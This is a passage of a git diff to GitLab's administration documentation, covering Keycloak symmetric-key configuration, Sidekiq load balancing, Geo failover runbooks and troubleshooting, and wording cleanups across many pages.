Troubleshooting Azure B2C +##### Configure Keycloak with a symmetric key algorithm -- Ensure all occurrences of `yourtenant.onmicrosoft.com`, `ProxyIdentityExperienceFrameworkAppId`, and `IdentityExperienceFrameworkAppId` match your B2C tenant hostname and -the respective client IDs in the XML policy files. +> Introduced in GitLab 14.2. -- Add `https://jwt.ms` as a redirect URI to the app, and use the [custom policy tester](https://docs.microsoft.com/en-us/azure/active-directory-b2c/tutorial-create-user-flows?pivots=b2c-custom-policy#test-the-custom-policy). -Make sure the payload includes `email` that matches the user's e-mail access. +WARNING: +The instructions below are included for completeness, but symmetric key +encryption should only be used when absolutely necessary. -- After you enable the custom policy, users might see "Invalid username or password" after they try to sign in. This might be a configuration -issue with the `IdentityExperienceFramework` app. See [this Microsoft comment](https://docs.microsoft.com/en-us/answers/questions/50355/unable-to-sign-on-using-custom-policy.html?childToView=122370#comment-122370) -that suggests checking that the app manifest contains these settings: +To use symmetric key encryption: - - `"accessTokenAcceptedVersion": null` - - `"signInAudience": "AzureADMyOrg"` +1. Extract the secret key from the Keycloak database. Keycloak doesn't expose this value in the Web + interface. The client secret seen in the Web interface is the OAuth2 client secret, which is + different from the secret used to sign JSON Web Tokens. + + For example, if you're using PostgreSQL as the backend database for Keycloak, log in to the + database console and extract the key via this SQL query: + + ```sql + $ psql -U keycloak + psql (13.3 (Debian 13.3-1.pgdg100+1)) + Type "help" for help. + + keycloak=# SELECT c.name, value FROM component_config CC INNER JOIN component C ON(CC.component_id = C.id) WHERE C.realm_id = 'master' and provider_id = 'hmac-generated' AND CC.name = 'secret'; + -[ RECORD 1 ]--------------------------------------------------------------------------------- + name | hmac-generated + value | lo6cqjD6Ika8pk7qc3fpFx9ysrhf7E62-sqGc8drp3XW-wr93zru8PFsQokHZZuJJbaUXvmiOftCZM3C4KW3-g + -[ RECORD 2 ]--------------------------------------------------------------------------------- + name | fallback-HS384 + value | UfVqmIs--U61UYsRH-NYBH3_mlluLONpg_zN7CXEwkJcO9xdRNlzZfmfDLPtf2xSTMvqu08R2VhLr-8G-oZ47A + ``` + + In this example, there are two private keys: one for HS256 (`hmac-generated`), and another for + HS384 (`fallback-HS384`). We use the first `value` to configure GitLab. + +1. Convert `value` to standard base64. As [discussed in the post](https://keycloak.discourse.group/t/invalid-signature-with-hs256-token/3228/9), + `value` is encoded in ["Base 64 Encoding with URL and Filename Safe Alphabet" in RFC 4648](https://datatracker.ietf.org/doc/html/rfc4648#section-5). + This needs to be converted to [standard base64 as defined in RFC 2045](https://datatracker.ietf.org/doc/html/rfc2045). + The following Ruby script does this: + + ```ruby + require 'base64' + + value = "lo6cqjD6Ika8pk7qc3fpFx9ysrhf7E62-sqGc8drp3XW-wr93zru8PFsQokHZZuJJbaUXvmiOftCZM3C4KW3-g" + Base64.encode64(Base64.urlsafe_decode64(value)) + ``` + + This results in the following value: + + ```markdown + lo6cqjD6Ika8pk7qc3fpFx9ysrhf7E62+sqGc8drp3XW+wr93zru8PFsQokH\nZZuJJbaUXvmiOftCZM3C4KW3+g==\n + ``` + +1. Specify this base64-encoded secret in `jwt_secret_base64`. For example: + + ```ruby + gitlab_rails['omniauth_providers'] = [ + { + 'name' => 'openid_connect', + 'label' => 'Keycloak', + 'args' => { + 'name' => 'openid_connect', + 'scope' => ['openid', 'profile', 'email'], + 'response_type' => 'code', + 'issuer' => 'https://keycloak.example.com/auth/realms/myrealm', + 'client_auth_method' => 'query', + 'discovery' => true, + 'uid_field' => 'preferred_username', + 'jwt_secret_base64' => '<YOUR BASE64-ENCODED SECRET>', + 'client_options' => { + 'identifier' => '<YOUR CLIENT ID>', + 'secret' => '<YOUR CLIENT SECRET>', + 'redirect_uri' => 'https://gitlab.example.com/users/auth/openid_connect/callback' + } + } + } + ] + ``` - Note that this configuration corresponds with the `Supported account types` setting used when creating the `IdentityExperienceFramework` app. +If after reconfiguring, you see the error `JSON::JWS::VerificationFailed` error message, this means +the incorrect secret was specified. ## General troubleshooting diff --git a/doc/administration/auth/okta.md b/doc/administration/auth/okta.md deleted file mode 100644 index 64b42339d19..00000000000 --- a/doc/administration/auth/okta.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: '../../integration/saml.md' -remove_date: '2021-06-15' ---- - -This document was moved to [another location](../../integration/saml.md). - -<!-- This redirect file can be deleted after 2021-06-15>. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/administration/compliance.md b/doc/administration/compliance.md index 6b80ddbcdb5..742d23105a9 100644 --- a/doc/administration/compliance.md +++ b/doc/administration/compliance.md @@ -10,13 +10,14 @@ You can configure the following GitLab features to help ensure that your GitLab instance meets common compliance standards. Click a feature name for additional documentation. -The [security features](../security/README.md) in GitLab may also help you meet +The [security features](../security/index.md) in GitLab may also help you meet relevant compliance standards. | Feature | GitLab tier | GitLab SaaS | Product level | |----------|:-----------:|:-----------:|:-------------:| |**[Restrict SSH Keys](../security/ssh_keys_restrictions.md)**<br>Control the technology and key length of SSH keys used to access GitLab. | Free+ | **{dotted-circle}** No | Instance | |**[Granular user roles and flexible permissions](../user/permissions.md)**<br>Manage access and permissions with five different user roles and settings for external users. Set permissions according to people's role, rather than either read or write access to a repository. Don't share the source code with people that only need access to the issue tracker. | Free+ | **{check-circle}** Yes | Instance, Group, Project | +|**[Generate reports on permission levels of users](../user/admin_area/index.md#user-permission-export)**<br>Administrators can generate a report listing all users' access permissions for groups and projects in the instance. | Premium+ | **{dotted-circle}** No | Instance | |**[Enforce TOS acceptance](../user/admin_area/settings/terms.md)**<br>Enforce your users accepting new terms of service by blocking GitLab traffic. | Free+ | **{dotted-circle}** No | Instance | |**[Email all users of a project, group, or entire server](../tools/email.md)**<br>An administrator can email groups of users based on project or group membership, or email everyone using the GitLab instance. This is great for scheduled maintenance or upgrades. | Premium+ | **{dotted-circle}** No | Instance | |**[Omnibus package supports log forwarding](https://docs.gitlab.com/omnibus/settings/logs.html#udp-log-forwarding)**<br>Forward your logs to a central system. | Premium+ | **{dotted-circle}** No | Instance | @@ -26,7 +27,7 @@ relevant compliance standards. |**[Audit events](audit_events.md)**<br>To maintain the integrity of your code, GitLab Enterprise Edition Premium gives administrators the ability to view any modifications made within the GitLab server in an advanced audit events system, so you can control, analyze, and track every change. | Premium+ | **{check-circle}** Yes | Instance, Group, Project | |**[Auditor users](auditor_users.md)**<br>Auditor users are users who are given read-only access to all projects, groups, and other resources on the GitLab instance. | Premium+ | **{dotted-circle}** No | Instance | |**[Credentials inventory](../user/admin_area/credentials_inventory.md)**<br>With a credentials inventory, GitLab administrators can keep track of the credentials used by all of the users in their GitLab instance. | Ultimate | **{dotted-circle}** No | Instance | -|**Separation of Duties using [Protected branches](../user/project/protected_branches.md#protected-branches-approval-by-code-owners) and [custom CI Configuration Paths](../ci/pipelines/settings.md#custom-cicd-configuration-file)**<br> GitLab Premium users can leverage the GitLab cross-project YAML configurations to define deployers of code and developers of code. View the [Separation of Duties Deploy Project](https://gitlab.com/guided-explorations/separation-of-duties-deploy/blob/master/README.md) and [Separation of Duties Project](https://gitlab.com/guided-explorations/separation-of-duties/blob/master/README.md) to see how to use this set up to define these roles. | Premium+ | **{check-circle}** Yes | Project | +|**Separation of Duties using [Protected branches](../user/project/protected_branches.md#require-code-owner-approval-on-a-protected-branch) and [custom CI Configuration Paths](../ci/pipelines/settings.md#specify-a-custom-cicd-configuration-file)**<br> GitLab Premium users can leverage the GitLab cross-project YAML configurations to define deployers of code and developers of code. View the [Separation of Duties Deploy Project](https://gitlab.com/guided-explorations/separation-of-duties-deploy/blob/master/README.md) and [Separation of Duties Project](https://gitlab.com/guided-explorations/separation-of-duties/blob/master/README.md) to see how to use this set up to define these roles. | Premium+ | **{check-circle}** Yes | Project | |**[Compliance frameworks](../user/project/settings/index.md#compliance-frameworks)**<br>Create a custom compliance framework at the group level to describe the type of compliance requirements any child project needs to follow. | Premium+ | **{check-circle}** Yes | Group | |**[Compliance pipelines](../user/project/settings/index.md#compliance-pipeline-configuration)**<br>Define a pipeline configuration to run for any projects with a given compliance framework. | Ultimate | **{check-circle}** Yes | Group | |**[Compliance dashboard](../user/compliance/compliance_dashboard/index.md)**<br>Quickly get visibility into the compliance posture of your organization. | Ultimate | **{check-circle}** Yes | Group | diff --git a/doc/administration/configure.md b/doc/administration/configure.md index 12a8f721ccf..73fbf527fe1 100644 --- a/doc/administration/configure.md +++ b/doc/administration/configure.md @@ -9,7 +9,7 @@ type: reference Customize and configure your self-managed GitLab installation. -- [Authentication](auth/README.md) +- [Authentication](auth/index.md) - [Configuration](../user/admin_area/index.md) - [Repository storage](repository_storage_paths.md) - [Geo](geo/index.md) diff --git a/doc/administration/database_load_balancing.md b/doc/administration/database_load_balancing.md index e9f989c96ea..7d17b22a4d7 100644 --- a/doc/administration/database_load_balancing.md +++ b/doc/administration/database_load_balancing.md @@ -31,7 +31,7 @@ sent to the primary (unless necessary), the primary (`db3`) hardly has any load. ## Requirements -For load balancing to work you will need at least PostgreSQL 11 or newer, +For load balancing to work, you need at least PostgreSQL 11 or newer, [**MySQL is not supported**](../install/requirements.md#database). You also need to make sure that you have at least 1 secondary in [hot standby](https://www.postgresql.org/docs/11/hot-standby.html) mode. @@ -42,7 +42,7 @@ you should put a load balancer in front of every database, and have GitLab conne to those load balancers. For example, say you have a primary (`db1.gitlab.com`) and two secondaries, -`db2.gitlab.com` and `db3.gitlab.com`. For this setup you will need to have 3 +`db2.gitlab.com` and `db3.gitlab.com`. For this setup, you need to have 3 load balancers, one for every host. For example: - `primary.gitlab.com` forwards to `db1.gitlab.com` @@ -56,7 +56,7 @@ means forwarding should now happen as follows: - `secondary1.gitlab.com` forwards to `db1.gitlab.com` - `secondary2.gitlab.com` forwards to `db3.gitlab.com` -GitLab does not take care of this for you, so you will need to do so yourself. +GitLab does not take care of this for you, so you need to do so yourself. Finally, load balancing requires that GitLab can connect to all hosts using the same credentials and port as configured in the @@ -72,7 +72,7 @@ different ports or credentials for different hosts is not supported. ## Enabling load balancing For the environment in which you want to use load balancing, you'll need to add -the following. This will balance the load between `host1.example.com` and +the following. This balances the load between `host1.example.com` and `host2.example.com`. **In Omnibus installations:** @@ -104,32 +104,19 @@ the following. This will balance the load between `host1.example.com` and 1. Save the file and [restart GitLab](restart_gitlab.md#installations-from-source) for the changes to take effect. -### Enable the load balancer for Sidekiq +### Load balancing for Sidekiq -Sidekiq mostly writes to the database, which means that most of its traffic hits the -primary database. +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/334494) in GitLab 14.1, load balancing for Sidekick is enabled by default. -Some background jobs can use database replicas to read application state. +Sidekiq jobs mostly write to the primary database, but there are read-only jobs that can benefit +from the use of Sidekiq load balancing. +These jobs can use load balancing and database replicas to read the application state. This allows to offload the primary database. -Load balancing is disabled by default in Sidekiq. When enabled, we can define -[the data consistency](../development/sidekiq_style_guide.md#job-data-consistency-strategies) +For Sidekiq, we can define +[data consistency](../development/sidekiq_style_guide.md#job-data-consistency-strategies) requirements for a specific job. -To enable it, define the `ENABLE_LOAD_BALANCING_FOR_SIDEKIQ` variable to the environment, as shown below. - -For Omnibus installations: - -```ruby -gitlab_rails['env'] = {"ENABLE_LOAD_BALANCING_FOR_SIDEKIQ" => "true"} -``` - -For installations from source: - -```shell -export ENABLE_LOAD_BALANCING_FOR_SIDEKIQ="true" -``` - ## Service Discovery > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/5883) in [GitLab Premium](https://about.gitlab.com/pricing/) 11.0. @@ -176,15 +163,15 @@ The following options can be set: | `disconnect_timeout` | The time in seconds after which an old connection is closed, after the list of hosts was updated. | 120 | | `use_tcp` | Lookup DNS resources using TCP instead of UDP | false | -If `record_type` is set to `SRV`, GitLab will continue to use a round-robin algorithm -and will ignore the `weight` and `priority` in the record. Since SRV records usually -return hostnames instead of IPs, GitLab will look for the IPs of returned hostnames +If `record_type` is set to `SRV`, then GitLab continues to use round-robin algorithm +and ignores the `weight` and `priority` in the record. Since SRV records usually +return hostnames instead of IPs, GitLab needs to look for the IPs of returned hostnames in the additional section of the SRV response. If no IP is found for a hostname, GitLab -will query the configured `nameserver` for ANY record for each such hostname looking for A or AAAA +needs to query the configured `nameserver` for ANY record for each such hostname looking for A or AAAA records, eventually dropping this hostname from rotation if it can't resolve its IP. The `interval` value specifies the _minimum_ time between checks. If the A -record has a TTL greater than this value, then service discovery will honor said +record has a TTL greater than this value, then service discovery honors said TTL. For example, if the TTL of the A record is 90 seconds, then service discovery waits at least 90 seconds before checking the A record again. diff --git a/doc/administration/external_pipeline_validation.md b/doc/administration/external_pipeline_validation.md index 9fc65fdd0b5..738cf591210 100644 --- a/doc/administration/external_pipeline_validation.md +++ b/doc/administration/external_pipeline_validation.md @@ -5,7 +5,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w type: reference, howto --- -# External pipeline validation +# External pipeline validation **(FREE SELF)** You can use an external service to validate a pipeline before it's created. diff --git a/doc/administration/geo/disaster_recovery/runbooks/planned_failover_multi_node.md b/doc/administration/geo/disaster_recovery/runbooks/planned_failover_multi_node.md index 4cfe781c7a4..16ae5bde062 100644 --- a/doc/administration/geo/disaster_recovery/runbooks/planned_failover_multi_node.md +++ b/doc/administration/geo/disaster_recovery/runbooks/planned_failover_multi_node.md @@ -19,7 +19,7 @@ This runbook is in **alpha**. For complete, production-ready documentation, see | Geo site | Multi-node | | Secondaries | One | -This runbook will guide you through a planned failover of a multi-node Geo site +This runbook guides you through a planned failover of a multi-node Geo site with one secondary. The following [2000 user reference architecture](../../../../administration/reference_architectures/2k_users.md) is assumed: ```mermaid @@ -46,7 +46,7 @@ graph TD The load balancer node and optional NFS server are omitted for clarity. -This guide will result in the following: +This guide results in the following: 1. An offline primary. 1. A promoted secondary that is now the new primary. @@ -76,7 +76,7 @@ On the **secondary** node: If any objects are failing to replicate, this should be investigated before scheduling the maintenance window. After a planned failover, anything that -failed to replicate will be **lost**. +failed to replicate is **lost**. You can use the [Geo status API](../../../../api/geo_nodes.md#retrieve-project-sync-or-verification-failures-that-occurred-on-the-current-node) @@ -117,10 +117,10 @@ follow these steps to avoid unnecessary data loss: sudo iptables -A INPUT --tcp-dport 443 -j REJECT ``` - From this point, users will be unable to view their data or make changes on the - **primary** node. They will also be unable to log in to the **secondary** node. - However, existing sessions will work for the remainder of the maintenance period, and - public data will be accessible throughout. + From this point, users are unable to view their data or make changes on the + **primary** node. They are also unable to log in to the **secondary** node. + However, existing sessions need to work for the remainder of the maintenance period, and + so public data is accessible throughout. 1. Verify the **primary** node is blocked to HTTP traffic by visiting it in browser via another IP. The server should refuse connection. @@ -170,8 +170,8 @@ follow these steps to avoid unnecessary data loss: 1. [Run an integrity check](../../../raketasks/check.md) to verify the integrity of CI artifacts, LFS objects, and uploads in file storage. - At this point, your **secondary** node will contain an up-to-date copy of everything the - **primary** node has, meaning nothing will be lost when you fail over. + At this point, your **secondary** node contains an up-to-date copy of everything the + **primary** node has, meaning nothing is lost when you fail over. 1. In this final step, you need to permanently disable the **primary** node. @@ -213,7 +213,7 @@ follow these steps to avoid unnecessary data loss: - If you do not have SSH access to the **primary** node, take the machine offline and prevent it from rebooting. Since there are many ways you may prefer to accomplish - this, we will avoid a single recommendation. You may need to: + this, we avoid a single recommendation. You may need to: - Reconfigure the load balancers. - Change DNS records (for example, point the **primary** DNS record to the @@ -248,7 +248,7 @@ issue has been fixed in GitLab 13.4 and later. WARNING: If the secondary node [has been paused](../../../geo/index.md#pausing-and-resuming-replication), this performs a point-in-time recovery to the last known state. -Data that was created on the primary while the secondary was paused will be lost. +Data that was created on the primary while the secondary was paused is lost. 1. SSH in to the PostgreSQL node in the **secondary** and promote PostgreSQL separately: diff --git a/doc/administration/geo/disaster_recovery/runbooks/planned_failover_single_node.md b/doc/administration/geo/disaster_recovery/runbooks/planned_failover_single_node.md index 6caeddad51a..36c9d46d650 100644 --- a/doc/administration/geo/disaster_recovery/runbooks/planned_failover_single_node.md +++ b/doc/administration/geo/disaster_recovery/runbooks/planned_failover_single_node.md @@ -19,7 +19,7 @@ This runbook is in **alpha**. For complete, production-ready documentation, see | Geo site | Single-node | | Secondaries | One | -This runbook will guide you through a planned failover of a single-node Geo site +This runbook guides you through a planned failover of a single-node Geo site with one secondary. The following general architecture is assumed: ```mermaid @@ -34,7 +34,7 @@ graph TD end ``` -This guide will result in the following: +This guide results in the following: 1. An offline primary. 1. A promoted secondary that is now the new primary. @@ -61,7 +61,7 @@ time to complete. If any objects are failing to replicate, this should be investigated before scheduling the maintenance window. After a planned failover, anything that -failed to replicate will be **lost**. +failed to replicate is **lost**. You can use the [Geo status API](../../../../api/geo_nodes.md#retrieve-project-sync-or-verification-failures-that-occurred-on-the-current-node) @@ -102,10 +102,10 @@ follow these steps to avoid unnecessary data loss: sudo iptables -A INPUT --tcp-dport 443 -j REJECT ``` - From this point, users will be unable to view their data or make changes on the - **primary** node. They will also be unable to log in to the **secondary** node. - However, existing sessions will work for the remainder of the maintenance period, and - public data will be accessible throughout. + From this point, users are unable to view their data or make changes on the + **primary** node. They are also unable to log in to the **secondary** node. + However, existing sessions need to work for the remainder of the maintenance period, and + so public data is accessible throughout. 1. Verify the **primary** node is blocked to HTTP traffic by visiting it in browser via another IP. The server should refuse connection. @@ -155,8 +155,8 @@ follow these steps to avoid unnecessary data loss: 1. [Run an integrity check](../../../raketasks/check.md) to verify the integrity of CI artifacts, LFS objects, and uploads in file storage. - At this point, your **secondary** node will contain an up-to-date copy of everything the - **primary** node has, meaning nothing will be lost when you fail over. + At this point, your **secondary** node contains an up-to-date copy of everything the + **primary** node has, meaning nothing is lost when you fail over. 1. In this final step, you need to permanently disable the **primary** node. @@ -198,7 +198,7 @@ follow these steps to avoid unnecessary data loss: - If you do not have SSH access to the **primary** node, take the machine offline and prevent it from rebooting. Since there are many ways you may prefer to accomplish - this, we will avoid a single recommendation. You may need to: + this, we avoid a single recommendation. You may need to: - Reconfigure the load balancers. - Change DNS records (for example, point the **primary** DNS record to the @@ -240,7 +240,7 @@ To promote the secondary node: 1. Run the following command to list out all preflight checks and automatically check if replication and verification are complete before scheduling a planned - failover to ensure the process will go smoothly: + failover to ensure the process goes smoothly: NOTE: In GitLab 13.7 and earlier, if you have a data type with zero items to sync, diff --git a/doc/administration/geo/glossary.md b/doc/administration/geo/glossary.md index 1ec552326aa..f8769d31ec7 100644 --- a/doc/administration/geo/glossary.md +++ b/doc/administration/geo/glossary.md @@ -21,7 +21,7 @@ these definitions yet. | Term | Definition | Scope | Discouraged synonyms | |---------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------|-------------------------------------------------| -| Node | An individual server that runs GitLab either with a specific role or as a whole (e.g. a Rails application node). In a cloud context this can be a specific machine type. | GitLab | instance, server | +| Node | An individual server that runs GitLab either with a specific role or as a whole (for example a Rails application node). In a cloud context this can be a specific machine type. | GitLab | instance, server | | Site | One or a collection of nodes running a single GitLab application. A site can be single-node or multi-node. | GitLab | deployment, installation instance | | Single-node site | A specific configuration of GitLab that uses exactly one node. | GitLab | single-server, single-instance | Multi-node site | A specific configuration of GitLab that uses more than one node. | GitLab | multi-server, multi-instance, high availability | @@ -31,7 +31,7 @@ these definitions yet. | Reference architecture(s) | A [specified configuration of GitLab for a number of users](../reference_architectures/index.md), possibly including multiple nodes and multiple sites. | GitLab | | | Promoting | Changing the role of a site from secondary to primary. | Geo-specific | | | Demoting | Changing the role of a site from primary to secondary. | Geo-specific | | -| Failover | The entire process that shifts users from a primary Site to a secondary site. This includes promoting a secondary, but contains other parts as well e.g. scheduling maintenance. | Geo-specific | | +| Failover | The entire process that shifts users from a primary Site to a secondary site. This includes promoting a secondary, but contains other parts as well. For example, scheduling maintenance. | Geo-specific | | ## Examples diff --git a/doc/administration/geo/replication/configuration.md b/doc/administration/geo/replication/configuration.md index 926c4c565aa..e8ffa1ae91a 100644 --- a/doc/administration/geo/replication/configuration.md +++ b/doc/administration/geo/replication/configuration.md @@ -196,9 +196,9 @@ keys must be manually replicated to the **secondary** node. gitlab-ctl reconfigure ``` -1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the top bar of the primary node, select **Menu >** **{admin}** **Admin**. 1. On the left sidebar, select **Geo > Nodes**. -1. Select **New node**. +1. Select **Add site**.  1. Fill in **Name** with the `gitlab_rails['geo_node_name']` in `/etc/gitlab/gitlab.rb`. These values must always match *exactly*, character diff --git a/doc/administration/geo/replication/datatypes.md b/doc/administration/geo/replication/datatypes.md index 6989765dbad..a56d9dc813c 100644 --- a/doc/administration/geo/replication/datatypes.md +++ b/doc/administration/geo/replication/datatypes.md @@ -209,6 +209,6 @@ successfully, you must replicate their data using some other means. #### Limitation of verification for files in Object Storage -GitLab managed Object Storage replication support [is in beta](object_storage.md#enabling-gitlab-managed-object-storage-replication). +GitLab managed Object Storage replication support [is in beta](object_storage.md#enabling-gitlab-managed-object-storage-replication). Locally stored files are verified but remote stored files are not. diff --git a/doc/administration/geo/replication/docker_registry.md b/doc/administration/geo/replication/docker_registry.md index cc0719442a1..5cc4f66017b 100644 --- a/doc/administration/geo/replication/docker_registry.md +++ b/doc/administration/geo/replication/docker_registry.md @@ -53,7 +53,7 @@ We need to make Docker Registry send notification events to the registry['notifications'] = [ { 'name' => 'geo_event', - 'url' => 'https://example.com/api/v4/container_registry_event/events', + 'url' => 'https://<example.com>/api/v4/container_registry_event/events', 'timeout' => '500ms', 'threshold' => 5, 'backoff' => '1s', @@ -65,7 +65,8 @@ We need to make Docker Registry send notification events to the ``` NOTE: - Replace `<replace_with_a_secret_token>` with a case sensitive alphanumeric string + Replace `<example.com>` with the `external_url` defined in your primary site's `/etc/gitlab/gitlab.rb` file, and + replace `<replace_with_a_secret_token>` with a case sensitive alphanumeric string that starts with a letter. You can generate one with `< /dev/urandom tr -dc _A-Z-a-z-0-9 | head -c 32 | sed "s/^[0-9]*//"; echo` NOTE: @@ -109,11 +110,14 @@ For each application and Sidekiq node on the **secondary** site: 1. Copy `/var/opt/gitlab/gitlab-rails/etc/gitlab-registry.key` from the **primary** to the node. -1. Edit `/etc/gitlab/gitlab.rb`: +1. Edit `/etc/gitlab/gitlab.rb` and add: ```ruby gitlab_rails['geo_registry_replication_enabled'] = true - gitlab_rails['geo_registry_replication_primary_api_url'] = 'https://primary.example.com:5050/' # Primary registry address, it will be used by the secondary node to directly communicate to primary registry + + # Primary registry's hostname and port, it will be used by + # the secondary node to directly communicate to primary registry + gitlab_rails['geo_registry_replication_primary_api_url'] = 'https://primary.example.com:5050/' ``` 1. Reconfigure the node for the change to take effect: diff --git a/doc/administration/geo/replication/faq.md b/doc/administration/geo/replication/faq.md index ef41b2ff172..28030dccb3b 100644 --- a/doc/administration/geo/replication/faq.md +++ b/doc/administration/geo/replication/faq.md @@ -23,7 +23,7 @@ For each project to sync: 1. Geo issues a `git fetch geo --mirror` to get the latest information from the **primary** site. If there are no changes, the sync is fast. Otherwise, it has to pull the latest commits. -1. The **secondary** site updates the tracking database to store the fact that it has synced projects A, B, C, etc. +1. The **secondary** site updates the tracking database to store the fact that it has synced projects A, B, C, and so on. 1. Repeat until all projects are synced. When someone pushes a commit to the **primary** site, it generates an event in the GitLab database that the repository has changed. @@ -46,8 +46,8 @@ Read the documentation for [Disaster Recovery](../disaster_recovery/index.md). ## What data is replicated to a **secondary** site? We currently replicate project repositories, LFS objects, generated -attachments / avatars and the whole database. This means user accounts, -issues, merge requests, groups, project data, etc., will be available for +attachments and avatars, and the whole database. This means user accounts, +issues, merge requests, groups, project data, and so on, will be available for query. ## Can I `git push` to a **secondary** site? @@ -58,7 +58,7 @@ Yes! Pushing directly to a **secondary** site (for both HTTP and SSH, including All replication operations are asynchronous and are queued to be dispatched. Therefore, it depends on a lot of factors including the amount of traffic, how big your commit is, the -connectivity between your sites, your hardware, etc. +connectivity between your sites, your hardware, and so on. ## What if the SSH server runs at a different port? diff --git a/doc/administration/geo/replication/location_aware_git_url.md b/doc/administration/geo/replication/location_aware_git_url.md index 014ca59e571..a80c293149e 100644 --- a/doc/administration/geo/replication/location_aware_git_url.md +++ b/doc/administration/geo/replication/location_aware_git_url.md @@ -88,7 +88,7 @@ routing configurations.  -You have successfully set up a single host, e.g. `git.example.com` which +You have successfully set up a single host, for example, `git.example.com` which distributes traffic to your Geo sites by geolocation! ## Configure Git clone URLs to use the special Git URL diff --git a/doc/administration/geo/replication/remove_geo_node.md b/doc/administration/geo/replication/remove_geo_node.md deleted file mode 100644 index b72cd3cbb95..00000000000 --- a/doc/administration/geo/replication/remove_geo_node.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: '../../geo/replication/remove_geo_site.md' -remove_date: '2021-06-01' ---- - -This document was moved to [another location](../../geo/replication/remove_geo_site.md). - -<!-- This redirect file can be deleted after 2021-06-01 --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/administration/geo/replication/security_review.md b/doc/administration/geo/replication/security_review.md index ae41599311b..966902a3d74 100644 --- a/doc/administration/geo/replication/security_review.md +++ b/doc/administration/geo/replication/security_review.md @@ -60,7 +60,7 @@ from [owasp.org](https://owasp.org/). access), but is constrained to read-only activities. The principal use case is envisioned to be cloning Git repositories from the **secondary** site in favor of the **primary** site, but end-users may use the GitLab web interface to view projects, - issues, merge requests, snippets, etc. + issues, merge requests, snippets, and so on. ### What security expectations do the end‐users have? @@ -203,7 +203,7 @@ from [owasp.org](https://owasp.org/). ### What data entry paths does the application support? - Data is entered via the web application exposed by GitLab itself. Some data is - also entered using system administration commands on the GitLab servers (e.g., + also entered using system administration commands on the GitLab servers (for example `gitlab-ctl set-primary-node`). - **Secondary** sites also receive inputs via PostgreSQL streaming replication from the **primary** site. @@ -247,7 +247,7 @@ from [owasp.org](https://owasp.org/). ### What encryption requirements have been defined for data in transit - including transmission over WAN, LAN, SecureFTP, or publicly accessible protocols such as http: and https:? - Data must have the option to be encrypted in transit, and be secure against - both passive and active attack (e.g., MITM attacks should not be possible). + both passive and active attack (for example, MITM attacks should not be possible). ## Access diff --git a/doc/administration/geo/replication/troubleshooting.md b/doc/administration/geo/replication/troubleshooting.md index c00f523957c..d63e927627a 100644 --- a/doc/administration/geo/replication/troubleshooting.md +++ b/doc/administration/geo/replication/troubleshooting.md @@ -327,7 +327,7 @@ Slots where `active` is `f` are not active. - When this slot should be active, because you have a **secondary** node configured using that slot, log in to that **secondary** node and check the PostgreSQL logs why the replication is not running. -- If you are no longer using the slot (e.g. you no longer have Geo enabled), you can remove it with in the +- If you are no longer using the slot (for example, you no longer have Geo enabled), you can remove it with in the PostgreSQL console session: ```sql @@ -378,7 +378,7 @@ This happens on wrongly-formatted addresses in `postgresql['md5_auth_cidr_addres ``` To fix this, update the IP addresses in `/etc/gitlab/gitlab.rb` under `postgresql['md5_auth_cidr_addresses']` -to respect the CIDR format (i.e. `1.2.3.4/32`). +to respect the CIDR format (that is, `1.2.3.4/32`). ### Message: `LOG: invalid IP mask "md5": Name or service not known` @@ -390,7 +390,7 @@ This happens when you have added IP addresses without a subnet mask in `postgres ``` To fix this, add the subnet mask in `/etc/gitlab/gitlab.rb` under `postgresql['md5_auth_cidr_addresses']` -to respect the CIDR format (i.e. `1.2.3.4/32`). +to respect the CIDR format (that is, `1.2.3.4/32`). ### Message: `Found data in the gitlabhq_production database!` when running `gitlab-ctl replicate-geo-database` @@ -588,6 +588,75 @@ to start again from scratch, there are a few steps that can help you: gitlab-ctl start ``` +### Design repository failures on mirrored projects and project imports + +On the top bar, under **Menu >** **{admin}** **Admin > Geo > Nodes**, +if the Design repositories progress bar shows +`Synced` and `Failed` greater than 100%, and negative `Queued`, then the instance +is likely affected by +[a bug in GitLab 13.2 and 13.3](https://gitlab.com/gitlab-org/gitlab/-/issues/241668). +It was [fixed in 13.4+](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/40643). + +To determine the actual replication status of design repositories in +a [Rails console](../../operations/rails_console.md): + +```ruby +secondary = Gitlab::Geo.current_node +counts = {} +secondary.designs.select("projects.id").find_each do |p| + registry = Geo::DesignRegistry.find_by(project_id: p.id) + state = registry ? "#{registry.state}" : "registry does not exist yet" + # puts "Design ID##{p.id}: #{state}" # uncomment this for granular information + counts[state] ||= 0 + counts[state] += 1 +end +puts "\nCounts:", counts +``` + +Example output: + +```plaintext +Design ID#5: started +Design ID#6: synced +Design ID#7: failed +Design ID#8: pending +Design ID#9: synced + +Counts: +{"started"=>1, "synced"=>2, "failed"=>1, "pending"=>1} +``` + +Example output if there are actually zero design repository replication failures: + +```plaintext +Design ID#5: synced +Design ID#6: synced +Design ID#7: synced + +Counts: +{"synced"=>3} +``` + +#### If you are promoting a Geo secondary site running on a single server + +`gitlab-ctl promotion-preflight-checks` will fail due to the existence of +`failed` rows in the `geo_design_registry` table. Use the +[previous snippet](#design-repository-failures-on-mirrored-projects-and-project-imports) to +determine the actual replication status of Design repositories. + +`gitlab-ctl promote-to-primary-node` will fail since it runs preflight checks. +If the [previous snippet](#design-repository-failures-on-mirrored-projects-and-project-imports) +shows that all designs are synced, then you can use the +`--skip-preflight-checks` option or the `--force` option to move forward with +promotion. + +#### If you are promoting a Geo secondary site running on multiple servers + +`gitlab-ctl promotion-preflight-checks` will fail due to the existence of +`failed` rows in the `geo_design_registry` table. Use the +[previous snippet](#design-repository-failures-on-mirrored-projects-and-project-imports) to +determine the actual replication status of Design repositories. + ## Fixing errors during a failover or when promoting a secondary to a primary node The following are possible errors that might be encountered during failover or @@ -726,6 +795,7 @@ sudo gitlab-ctl promotion-preflight-checks sudo /opt/gitlab/embedded/bin/gitlab-pg-ctl promote sudo gitlab-ctl reconfigure sudo gitlab-rake 